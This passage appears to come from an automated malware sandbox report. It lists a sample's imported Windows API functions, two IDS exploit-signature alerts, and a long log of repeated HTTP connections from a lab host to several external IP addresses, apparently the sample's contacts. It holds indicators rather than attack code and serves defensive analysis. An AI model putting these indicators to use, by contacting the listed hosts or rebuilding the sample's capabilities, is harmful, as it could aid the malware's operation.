GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll | DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll | SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-06T15:59:25.999363+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.8 | 49706 | TCP
2024-11-06T16:00:03.959754+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.8 | 49712 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                        Nov 6, 2024 16:00:28.603564978 CET4972080192.168.2.866.29.146.14
                                                                                        Nov 6, 2024 16:00:28.608390093 CET804972066.29.146.14192.168.2.8
                                                                                        Nov 6, 2024 16:00:29.261261940 CET804972066.29.146.14192.168.2.8
                                                                                        Nov 6, 2024 16:00:29.261280060 CET804972066.29.146.14192.168.2.8
                                                                                        Nov 6, 2024 16:00:29.261300087 CET804972066.29.146.14192.168.2.8
                                                                                        Nov 6, 2024 16:00:29.261312962 CET804972066.29.146.14192.168.2.8
                                                                                        Nov 6, 2024 16:00:29.261339903 CET804972066.29.146.14192.168.2.8
                                                                                        Nov 6, 2024 16:00:29.261351109 CET804972066.29.146.14192.168.2.8
                                                                                        Nov 6, 2024 16:00:29.261363983 CET804972066.29.146.14192.168.2.8
                                                                                        Nov 6, 2024 16:00:29.261375904 CET804972066.29.146.14192.168.2.8
                                                                                        Nov 6, 2024 16:00:29.261457920 CET804972066.29.146.14192.168.2.8
                                                                                        Nov 6, 2024 16:00:29.261465073 CET4972080192.168.2.866.29.146.14
                                                                                        Nov 6, 2024 16:00:29.261471987 CET804972066.29.146.14192.168.2.8
                                                                                        Nov 6, 2024 16:00:29.261528015 CET4972080192.168.2.866.29.146.14
                                                                                        Nov 6, 2024 16:00:29.261528015 CET4972080192.168.2.866.29.146.14
                                                                                        Nov 6, 2024 16:00:29.266565084 CET804972066.29.146.14192.168.2.8
                                                                                        Nov 6, 2024 16:00:29.300513983 CET804972066.29.146.14192.168.2.8
                                                                                        Nov 6, 2024 16:00:29.300791025 CET4972080192.168.2.866.29.146.14
                                                                                        Nov 6, 2024 16:00:29.303809881 CET4972080192.168.2.866.29.146.14
                                                                                        Nov 6, 2024 16:00:29.309451103 CET804972066.29.146.14192.168.2.8
                                                                                        Nov 6, 2024 16:00:34.476797104 CET4972180192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:34.481831074 CET8049721209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:34.482019901 CET4972180192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:34.495141983 CET4972180192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:34.500096083 CET8049721209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:35.159296989 CET8049721209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:35.199009895 CET8049721209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:35.199153900 CET4972180192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:35.997772932 CET4972180192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:37.024806976 CET4972280192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:37.030020952 CET8049722209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:37.030097008 CET4972280192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:37.062380075 CET4972280192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:37.067323923 CET8049722209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:37.707505941 CET8049722209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:37.746562958 CET8049722209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:37.746670008 CET4972280192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:38.575913906 CET4972280192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:39.617824078 CET4972380192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:39.623698950 CET8049723209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:39.627969027 CET4972380192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:39.699631929 CET4972380192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:39.704651117 CET8049723209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:39.704732895 CET8049723209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:40.305983067 CET8049723209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:40.345663071 CET8049723209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:40.345839977 CET4972380192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:41.200851917 CET4972380192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:42.219898939 CET4972480192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:42.224786997 CET8049724209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:42.224942923 CET4972480192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:42.233305931 CET4972480192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:42.238230944 CET8049724209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:42.892618895 CET8049724209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:42.931760073 CET8049724209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:42.931910038 CET4972480192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:42.936811924 CET4972480192.168.2.8209.74.64.58
                                                                                        Nov 6, 2024 16:00:42.941855907 CET8049724209.74.64.58192.168.2.8
                                                                                        Nov 6, 2024 16:00:48.368021011 CET4972580192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:48.372976065 CET804972547.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:48.373043060 CET4972580192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:48.385265112 CET4972580192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:48.390098095 CET804972547.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:49.338651896 CET804972547.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:49.435180902 CET4972580192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:49.528079033 CET804972547.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:49.528139114 CET4972580192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:49.888348103 CET4972580192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:50.956468105 CET4972680192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:51.089226007 CET804972647.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:51.089343071 CET4972680192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:51.101100922 CET4972680192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:51.106010914 CET804972647.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:52.077533007 CET804972647.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:52.258033037 CET804972647.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:52.258166075 CET4972680192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:52.607183933 CET4972680192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:53.685264111 CET4972780192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:53.690387964 CET804972747.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:53.690489054 CET4972780192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:53.774487019 CET4972780192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:53.779752970 CET804972747.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:53.779870987 CET804972747.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:54.698548079 CET804972747.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:54.862524986 CET804972747.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:54.862651110 CET4972780192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:55.279004097 CET4972780192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:56.312800884 CET4972880192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:56.317869902 CET804972847.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:56.317955017 CET4972880192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:56.334151030 CET4972880192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:56.339049101 CET804972847.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:57.285500050 CET804972847.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:57.450794935 CET4972880192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:57.478028059 CET804972847.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:00:57.478140116 CET4972880192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:57.483458042 CET4972880192.168.2.847.242.89.146
                                                                                        Nov 6, 2024 16:00:57.488399029 CET804972847.242.89.146192.168.2.8
                                                                                        Nov 6, 2024 16:01:02.576173067 CET4972980192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:02.581056118 CET8049729128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:02.581120014 CET4972980192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:02.655230999 CET4972980192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:02.660190105 CET8049729128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:03.414921999 CET8049729128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:03.535031080 CET8049729128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:03.535146952 CET4972980192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:04.169658899 CET4972980192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:05.189579964 CET4973080192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:05.194648981 CET8049730128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:05.194726944 CET4973080192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:05.209865093 CET4973080192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:05.214720011 CET8049730128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:06.028194904 CET8049730128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:06.148612976 CET8049730128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:06.148727894 CET4973080192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:06.716485977 CET4973080192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:07.765383005 CET4973180192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:07.770296097 CET8049731128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:07.771876097 CET4973180192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:07.805094004 CET4973180192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:07.810869932 CET8049731128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:07.810914993 CET8049731128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:08.612478971 CET8049731128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:08.733149052 CET8049731128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:08.733248949 CET4973180192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:09.310240030 CET4973180192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:10.338727951 CET4973280192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:10.343631983 CET8049732128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:10.343878984 CET4973280192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:10.354365110 CET4973280192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:10.359244108 CET8049732128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:11.182080984 CET8049732128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:11.249896049 CET4973280192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:11.302639008 CET8049732128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:11.302747011 CET4973280192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:11.304034948 CET4973280192.168.2.8128.65.195.180
                                                                                        Nov 6, 2024 16:01:11.308825016 CET8049732128.65.195.180192.168.2.8
                                                                                        Nov 6, 2024 16:01:16.368697882 CET4973380192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:16.373608112 CET8049733217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:16.373696089 CET4973380192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:16.387243032 CET4973380192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:16.392119884 CET8049733217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:17.197098017 CET8049733217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:17.247760057 CET4973380192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:17.307792902 CET8049733217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:17.307940960 CET4973380192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:17.923306942 CET4973380192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:18.938258886 CET4973480192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:18.943213940 CET8049734217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:18.943303108 CET4973480192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:18.954898119 CET4973480192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:18.959867001 CET8049734217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:19.766999960 CET8049734217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:19.810091972 CET4973480192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:19.875993967 CET8049734217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:19.876053095 CET4973480192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:20.475802898 CET4973480192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:21.485761881 CET4973580192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:21.490911007 CET8049735217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:21.493879080 CET4973580192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:21.504544020 CET4973580192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:21.510080099 CET8049735217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:21.511590004 CET8049735217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:22.318883896 CET8049735217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:22.429598093 CET8049735217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:22.429753065 CET4973580192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:23.013386965 CET4973580192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:24.033845901 CET4973680192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:24.038877010 CET8049736217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:24.038990021 CET4973680192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:24.048579931 CET4973680192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:24.053369045 CET8049736217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:24.861299992 CET8049736217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:24.861321926 CET8049736217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:24.861483097 CET4973680192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:24.972044945 CET8049736217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:24.973948956 CET4973680192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:24.975011110 CET4973680192.168.2.8217.70.184.50
                                                                                        Nov 6, 2024 16:01:24.981053114 CET8049736217.70.184.50192.168.2.8
                                                                                        Nov 6, 2024 16:01:30.002938032 CET4973780192.168.2.83.33.130.190
                                                                                        Nov 6, 2024 16:01:30.007985115 CET80497373.33.130.190192.168.2.8
Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Nov 6, 2024 16:01:30.008065939 CET  49737        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:30.023247957 CET  49737        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:30.028183937 CET  80           49737      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:30.634665012 CET  80           49737      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:30.636127949 CET  49737        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:31.528918982 CET  49737        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:31.534929037 CET  80           49737      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:32.549717903 CET  49738        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:32.554702997 CET  80           49738      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:32.557912111 CET  49738        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:32.569741011 CET  49738        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:32.574671030 CET  80           49738      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:33.208440065 CET  80           49738      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:33.208518028 CET  49738        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:33.456734896 CET  80           49738      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:33.460052013 CET  49738        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:34.075964928 CET  49738        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:34.080761909 CET  80           49738      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:35.094980001 CET  49739        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:35.100025892 CET  80           49739      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:35.100157022 CET  49739        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:35.112355947 CET  49739        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:35.117278099 CET  80           49739      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:35.117301941 CET  80           49739      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:35.729578018 CET  80           49739      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:35.729646921 CET  49739        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:36.625705004 CET  49739        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:36.630620003 CET  80           49739      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:37.647687912 CET  49740        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:37.652754068 CET  80           49740      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:37.652818918 CET  49740        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:37.665546894 CET  49740        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:37.670480967 CET  80           49740      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:38.300812960 CET  80           49740      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:38.301464081 CET  80           49740      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:38.301521063 CET  49740        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:38.304405928 CET  49740        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:38.309263945 CET  80           49740      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:43.477101088 CET  49741        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:43.483387947 CET  80           49741      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:43.483479977 CET  49741        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:43.496015072 CET  49741        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:43.502142906 CET  80           49741      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:44.120445013 CET  80           49741      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:44.120563030 CET  49741        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:44.997678041 CET  49741        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:45.002873898 CET  80           49741      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:46.016784906 CET  49742        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:46.021826029 CET  80           49742      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:46.021904945 CET  49742        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:46.035428047 CET  49742        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:46.040503025 CET  80           49742      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:46.659946918 CET  80           49742      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:46.660106897 CET  49742        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:47.545691013 CET  49742        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:47.550731897 CET  80           49742      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:48.564390898 CET  49743        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:49.307164907 CET  80           49743      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:49.308008909 CET  49743        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:49.319799900 CET  49743        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:49.324690104 CET  80           49743      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:49.324800014 CET  80           49743      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:50.222573042 CET  80           49743      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:50.222645998 CET  49743        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:50.223664045 CET  80           49743      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:50.223711967 CET  49743        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:50.825823069 CET  49743        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:50.831166983 CET  80           49743      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:51.848097086 CET  49744        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:51.853526115 CET  80           49744      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:51.853595972 CET  49744        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:51.922350883 CET  49744        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:51.927476883 CET  80           49744      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:52.473377943 CET  80           49744      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:52.474633932 CET  80           49744      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:52.474673986 CET  49744        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:52.476592064 CET  49744        80         192.168.2.8    3.33.130.190
Nov 6, 2024 16:01:52.481645107 CET  80           49744      3.33.130.190   192.168.2.8
Nov 6, 2024 16:01:58.244836092 CET  49745        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:01:58.249851942 CET  80           49745      47.52.221.8    192.168.2.8
Nov 6, 2024 16:01:58.249913931 CET  49745        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:01:58.266865969 CET  49745        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:01:58.272511959 CET  80           49745      47.52.221.8    192.168.2.8
Nov 6, 2024 16:01:59.256027937 CET  80           49745      47.52.221.8    192.168.2.8
Nov 6, 2024 16:01:59.313668013 CET  49745        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:01:59.446922064 CET  80           49745      47.52.221.8    192.168.2.8
Nov 6, 2024 16:01:59.447036982 CET  49745        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:01:59.815679073 CET  49745        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:00.829099894 CET  49746        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:00.834003925 CET  80           49746      47.52.221.8    192.168.2.8
Nov 6, 2024 16:02:00.834115028 CET  49746        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:00.846220970 CET  49746        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:00.851049900 CET  80           49746      47.52.221.8    192.168.2.8
Nov 6, 2024 16:02:01.816914082 CET  80           49746      47.52.221.8    192.168.2.8
Nov 6, 2024 16:02:01.856892109 CET  49746        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:02.008589029 CET  80           49746      47.52.221.8    192.168.2.8
Nov 6, 2024 16:02:02.008699894 CET  49746        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:02.356988907 CET  49746        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:03.375881910 CET  49747        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:03.380927086 CET  80           49747      47.52.221.8    192.168.2.8
Nov 6, 2024 16:02:03.381104946 CET  49747        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:03.392417908 CET  49747        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:03.398269892 CET  80           49747      47.52.221.8    192.168.2.8
Nov 6, 2024 16:02:03.398313999 CET  80           49747      47.52.221.8    192.168.2.8
Nov 6, 2024 16:02:04.362221956 CET  80           49747      47.52.221.8    192.168.2.8
Nov 6, 2024 16:02:04.403821945 CET  49747        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:04.553662062 CET  80           49747      47.52.221.8    192.168.2.8
Nov 6, 2024 16:02:04.553730965 CET  49747        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:04.905644894 CET  49747        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:05.923741102 CET  49748        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:05.928653955 CET  80           49748      47.52.221.8    192.168.2.8
Nov 6, 2024 16:02:05.928719997 CET  49748        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:05.939378023 CET  49748        80         192.168.2.8    47.52.221.8
Nov 6, 2024 16:02:05.944184065 CET  80           49748      47.52.221.8    192.168.2.8
Nov 6, 2024 16:02:07.114680052 CET  80           49748      47.52.221.8    192.168.2.8
Nov 6, 2024 16:02:07.117245913 CET  80           49748      47.52.221.8    192.168.2.8
